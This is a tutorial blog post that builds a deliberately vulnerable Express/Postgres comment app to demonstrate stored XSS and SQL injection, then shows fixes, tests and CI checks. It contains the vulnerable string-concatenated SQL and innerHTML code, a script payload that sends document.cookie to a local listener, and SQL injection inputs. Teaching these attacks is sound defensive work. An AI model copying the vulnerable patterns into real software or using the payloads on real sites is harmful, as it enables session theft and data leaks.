,

I Finally Understood XSS and SQL Injection After Seeing This Demo

Posted by

A hands-on demo that makes the mechanics of XSS and SQL injection impossible to forget and shows the exact fixes you should apply today.

A hands-on demo that makes the mechanics of XSS and SQL injection impossible to forget and shows the exact fixes you should apply today.

Introduction

I used to explain XSS and SQL injection with diagrams and slides. People would nod, jot notes, then go back to code and never change habits.

Everything clicked the day I built a tiny vulnerable app and then exploited it in a controlled demo. Seeing the payload run in the browser and watching a crafted input leak rows from the database turned abstract warnings into obvious anti-patterns.

This article walks through that exact demo: the vulnerable code (frontend + backend), how the exploit works step-by-step, and the fixes you apply immediately. You will learn:

  • The minimal vulnerable code that makes XSS and SQLi possible
  • How attackers craft payloads and why those payloads succeed
  • Safe, copy-paste fixes (server-side and client-side)
  • How to test and automate checks so this never sneaks back in

I will not assume prior mastery. If you follow the demo locally (staging only, never test exploits against production or systems you do not own), you will understand these attacks at a visceral level and leave with practical defenses.


1. The Demo Overview: What I Built and Why

Goal: build the smallest possible full-stack app that demonstrates both vulnerabilities.

Stack (minimal, easy to run locally):

  • Backend: Node.js + Express + Postgres (or SQLite for local)
  • Frontend: simple HTML + vanilla JS (or React)
  • Purpose: a microblog with a comment form and an admin search panel

Why this layout? Because it hits the common real-world patterns: user input saved to a database and then rendered back to other users, and a search/lookup route that reads DB rows based on arbitrary input.

The demo intentionally contains two problems:

  1. Unsafe rendering on the frontend (no escaping / innerHTML use) → Stored XSS.
  2. Unsafe SQL construction on the backend (string concatenation) → SQL injection.

This is a minimal but realistic setup that mirrors many real apps.


2. Vulnerable Code Backend (Express + Postgres)

Here is a single file app.js that implements the vulnerable endpoints. Run this only in a local dev/staging environment.

// app.js (vulnerable demo)
const express = require('express');
const bodyParser = require('body-parser');
const { Client } = require('pg'); // or use sqlite for a local quick start

const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));

const client = new Client({
connectionString: process.env.DATABASE_URL || 'postgres://localhost:5432/demo',
});
client.connect();

// Create table (run once)
async function init() {
await client.query(`
CREATE TABLE IF NOT EXISTS comments (
id SERIAL PRIMARY KEY,
author TEXT,
content TEXT
);
`);
}
init();

// Save comment - insecure (demonstrates SQLi)
app.post('/comments', async (req, res) => {
const { author, content } = req.body;
// Vulnerable: string concatenation
const sql = `INSERT INTO comments (author, content) VALUES ('${author}', '${content}') RETURNING id`;
try {
const result = await client.query(sql);
res.json({ id: result.rows[0].id });
} catch (err) {
console.error(err);
res.status(500).send('DB error');
}
});

// List comments (rendered by frontend)
app.get('/comments', async (req, res) => {
const result = await client.query('SELECT id, author, content FROM comments ORDER BY id DESC LIMIT 50');
res.json(result.rows);
});

// Admin search - insecure (demonstrates SQLi)
app.get('/admin/search', async (req, res) => {
const q = req.query.q || '';
// Vulnerable: directly interpolating user input into SQL
const sql = `SELECT id, author, content FROM comments WHERE content ILIKE '%${q}%' LIMIT 100`;
const result = await client.query(sql);
res.json(result.rows);
});

app.listen(3000, () => console.log('Listening on 3000'));

Two unsafe patterns to notice:

  • INSERT with '${author}' and '${content}' a single quote in the input breaks the query.
  • ILIKE '%${q}%' search term interpolated directly into SQL.

3. Vulnerable Code Frontend (simple HTML + JS)

Place this simple page index.html that submits comments and renders them unsafely.

<!-- index.html (vulnerable demo) -->
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Vulnerable Demo</title>
</head>
<body>
<h1>Comments</h1>
<form id="commentForm">
<input name="author" placeholder="Your name" /><br/>
<textarea name="content" placeholder="Write a comment"></textarea><br/>
<button type="submit">Post</button>
</form>

<div id="comments"></div>

<script>
async function loadComments() {
const res = await fetch('/comments');
const rows = await res.json();
const container = document.getElementById('comments');
container.innerHTML = ''; // unsafe rendering
rows.forEach(r => {
// Unsafe: injecting user content as HTML
const div = document.createElement('div');
div.innerHTML = `<strong>${r.author}</strong>: ${r.content}`;
container.appendChild(div);
});
}

document.getElementById('commentForm').addEventListener('submit', async (e) => {
e.preventDefault();
const form = e.target;
const author = form.author.value;
const content = form.content.value;
await fetch('/comments', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ author, content })
});
form.reset();
loadComments();
});

loadComments();
</script>
</body>
</html>

innerHTML and template interpolation is the problem. Anything stored as content will be treated as HTML and executed by the browser.


4. Exploiting the Demo XSS (Stored) Walkthrough

With the demo running locally, perform this safe experiment:

  1. Open the app in your browser (localhost:3000).
  2. Post a regular comment: author = Alice, content = Hello.
  3. Post an exploit comment:
     author = Mallory
     content = <script>fetch('http://localhost:9999/steal?c=' + encodeURIComponent(document.cookie))</script>
  4. In a second terminal, start a small server to observe stolen cookies (only on staging/local):
# quick and dirty server to log incoming requests on port 9999
python3 -m http.server 9999
# Or use a small express app that logs queries

5. Refresh a different browser (or an incognito browser) and load the comments page as a non-admin user. You should see the fetch() run and the request appear on port 9999, demonstrating that the script executed in another user’s browser context.

Why it works:

  • The malicious script was stored in the DB from the POST.
  • When pages render, the frontend uses innerHTML, so the script is executed.
  • This allows session theft, DOM manipulation, and more.

This is stored XSS. It persists in the database and runs whenever any user views the comment.


5. Exploiting the Demo SQL Injection Walkthrough

Now test SQLi. On the vulnerable admin route, /admin/search?q=... try queries that reveal DB behavior.

Simple test to cause an error or return extra rows:

  • Request: GET /admin/search?q=' OR '1'='1

Because the server builds ILIKE '%${q}%', this becomes:

SELECT id, author, content FROM comments WHERE content ILIKE '%' OR '1'='1'%' LIMIT 100

This may result in syntax errors or return all rows, depending on how the DB interprets it. A more targeted SQLi example tries to extract data using PostgreSQL-specific constructs (only in authorized testing). For local demos, you can demonstrate that an input with a single quote breaks the query and produces an error, revealing column names, showing how an attacker can iterate to extract data.

Another demonstration (blind SQLi local) use q='; SELECT version(); -- to show that arbitrary SQL can be appended (not guaranteed across DBs in this naive demo, but the principle is clear).

Why it works:

  • The SQL string is built by concatenating untrusted input.
  • The DB executes the final string with the injected segments interpreted as SQL.
  • Attackers can modify the query structure to read, change, or delete data.

6. The Fixes Server Side (Parameterized Queries)

Replace unsafe concatenation with parameterized queries. For pg:

// safe insert
app.post('/comments', async (req, res) => {
const { author, content } = req.body;
const sql = 'INSERT INTO comments (author, content) VALUES ($1, $2) RETURNING id';
try {
const result = await client.query(sql, [author, content]);
res.json({ id: result.rows[0].id });
} catch (err) {
console.error(err);
res.status(500).send('DB error');
}
});

// safe search using parameterized LIKE
app.get('/admin/search', async (req, res) => {
const q = req.query.q || '';
const sql = 'SELECT id, author, content FROM comments WHERE content ILIKE $1 LIMIT 100';
const result = await client.query(sql, [`%${q}%`]);
res.json(result.rows);
});

Why this works:

  • The SQL statement and parameters are sent separately to the DB driver.
  • The driver treats parameter values strictly as data, never as SQL tokens.
  • No matter what q contains, it cannot change SQL grammar.

If you use an ORM (Prisma, TypeORM, Sequelize), prefer ORM query methods or parameter bindings rather than raw SQL strings. If raw SQL is unavoidable, build it with proper identifier whitelists and parameterize values.


7. The Fixes Client Side (Escaping & Sanitization)

Change the frontend to never inject raw HTML. Two options:

Option A: Render as text (recommended when HTML is not required)

// replace innerHTML usage
rows.forEach(r => {
const div = document.createElement('div');
// Use text nodes instead of HTML injection
const strong = document.createElement('strong');
strong.textContent = r.author;
div.appendChild(strong);
div.appendChild(document.createTextNode(': ' + r.content));
container.appendChild(div);
});

Option B: If you must allow limited HTML (rich text), sanitize before rendering

Use DOMPurify on the server or client:

// sanitize on the client (if HTML allowed)
import DOMPurify from 'dompurify';
div.innerHTML = `<strong>${escapeHtml(r.author)}</strong>: ${DOMPurify.sanitize(r.content)}`;

Prefer server-side sanitization for stored HTML to avoid storing unsafe content in the DB. Use a strict allowlist (tags and attributes) and disallow on* event handlers, javascript: URIs, and <iframe>.

Also, set security headers:

// Example CSP header (adjust to your app)
res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'; object-src 'none';");

Cookies:

  • Mark cookies HttpOnly to prevent JavaScript access: res.cookie('sid', token, { httpOnly: true, secure: true })
  • Use SameSite as appropriate.

8. Input Validation Defense in Depth

Parameterizing SQL and escaping output are critical, but adding input validation as an additional line of defense.

Use Zod or Joi on the server:

import { z } from 'zod';
const commentSchema = z.object({
author: z.string().min(1).max(100),
content: z.string().min(1).max(2000),
});

app.post('/comments', async (req, res) => {
const parse = commentSchema.safeParse(req.body);
if (!parse.success) return res.status(400).json({ error: 'Invalid input' });
const { author, content } = parse.data;
// use parameterized query here
});

Validation prevents oversized payloads, rejects suspicious types, and makes it harder to craft certain automated attacks.


9. Testing the Fixes Unit, Integration, and E2E

Add tests to ensure bugs do not reappear.

Unit / Integration (Jest + Supertest):

test('rejects script tags in content when rendering as text', async () => {
await request(app).post('/comments').send({ author: 'A', content: '<script>alert(1)</script>' });
const res = await request(app).get('/comments');
expect(res.status).toBe(200);
expect(res.body.some(c => c.content.includes('<script>'))).toBe(false); // or assert sanitized
});

test('search parameter is parameterized and safe', async () => {
const res = await request(app).get('/admin/search?q=%27%20OR%20%271%27=%271');
expect(res.status).toBe(200); // should not execute unintended payload
});

E2E (Cypress):

  • Insert a malicious comment into the DB directly (simulate stored XSS) and assert the page does not execute it.
  • Test that admin/search returns appropriate results and not DB errors.

Run these tests in CI on staging. Failing tests should block merges.


10. Static Analysis and CI Automation

To prevent regressions, add automated checks:

  1. Semgrep rules to detect common anti-patterns:
  • Flag innerHTML, dangerouslySetInnerHTML, eval usage.
  • Flag string concatenation is used in DB queries.

2. CodeQL to scan for injection patterns.

3. Dependency scanning (Snyk, Dependabot) to keep libs updated.

4. SAST on PRs to detect dangerous constructs early.

Example Semgrep rule (pattern to detect SQL concatenation in JS):

rules:
- id: js-sql-concat
pattern: |
client.query("... " + $X + " ...")
message: "Possible SQL concatenation; use parameterized queries."
languages: [javascript]

Add these checks to GitHub Actions so PRs fail on violations.


11. Runtime Protections (Defense In Depth)

Even with code fixes, add run-time protections:

  • WAF (Cloudflare, AWS WAF) to block obvious attack payloads.
  • CSP reporting to collect violations (report-uri).
  • WAF logging + SIEM to detect scanning and probing patterns.
  • Rate limiting to reduce automated scraping or brute force.
  • Monitor DB errors, frequent SQL errors from malformed inputs often indicate scanning.

Remember: runtime protections do not replace correct coding; they supplement it.


12. Responsible Testing Warning

A repeated note: never run exploit tools or attack tests against production or systems you do not own. Use a local sandbox or authorized staging environment. Unauthorized probing is illegal and unethical.

For learning: create throwaway local databases, isolated VMs, or containerized environments specifically for security testing.


13. Checklist: What You Must Do Right Now

If you have a web app, run through this checklist immediately:

  1. Search for innerHTML, dangerouslySetInnerHTML, eval, new Function in your codebase. Replace or audit each use.
  2. Search for raw SQL string concatenation patterns. Replace with parameterized queries or ORM bindings.
  3. Add server-side input validation (Zod, Joi, Yup).
  4. Sanitize any user-submitted HTML with DOMPurify or sanitize-html, with a strict tag/attribute allowlist.
  5. Add tests that assert malicious payloads are sanitized and do not execute.
  6. Add Semgrep/CodeQL rules to the project and run them on PRs.
  7. Set CSP, secure cookies (HttpOnly, Secure, SameSite), and redirect to HTTPS.
  8. Add rate limits and WAF rules for public endpoints.

14. Why Seeing It Live Changes Everything

Why did the demo work so well for me? Because it turned abstract rules into cause and effect:

  • Stored XSS became obvious when a script I posted in the DB ran in another browser.
  • SQLi became obvious when a single quote or a' OR '1'='1' change in DB behavior occurred.
  • Fixes became obvious because the same tiny changes eliminated the exploit immediately.

A diagram or slide can explain the theory, but a controlled demo builds an unshakable intuition.


Conclusion

XSS and SQL injection aren’t theoretical threats from mysterious attackers. They are predictable outcomes of mixing data with code and failing to enforce boundaries.

If you want to truly understand these vulnerabilities, build the smallest vulnerable demo locally, exploit it in a controlled way, and then fix it. The experiential loop of break → observe → fix cements the right habits faster than any lecture.

Run through the checklist above. Add automated tests and static checks to CI. Teach teammates to avoid the anti-patterns. And the next time someone claims “our code is probably safe,” ask to see the demo.


Call to Action

If you want, I can:

  • Provide a sanitized version of the demo ready to git clone and run locally (with scripts for SQLite to avoid Postgres setup).
  • Generate Semgrep rules tailored to your stack (Node/Express, Django, Rails, etc.).
  • Produce a one-page cheat sheet to pin in your repo (SECURITY_CHECKLIST.md) with the exact commands and test cases shown here.

Leave a Reply

Your email address will not be published. Required fields are marked *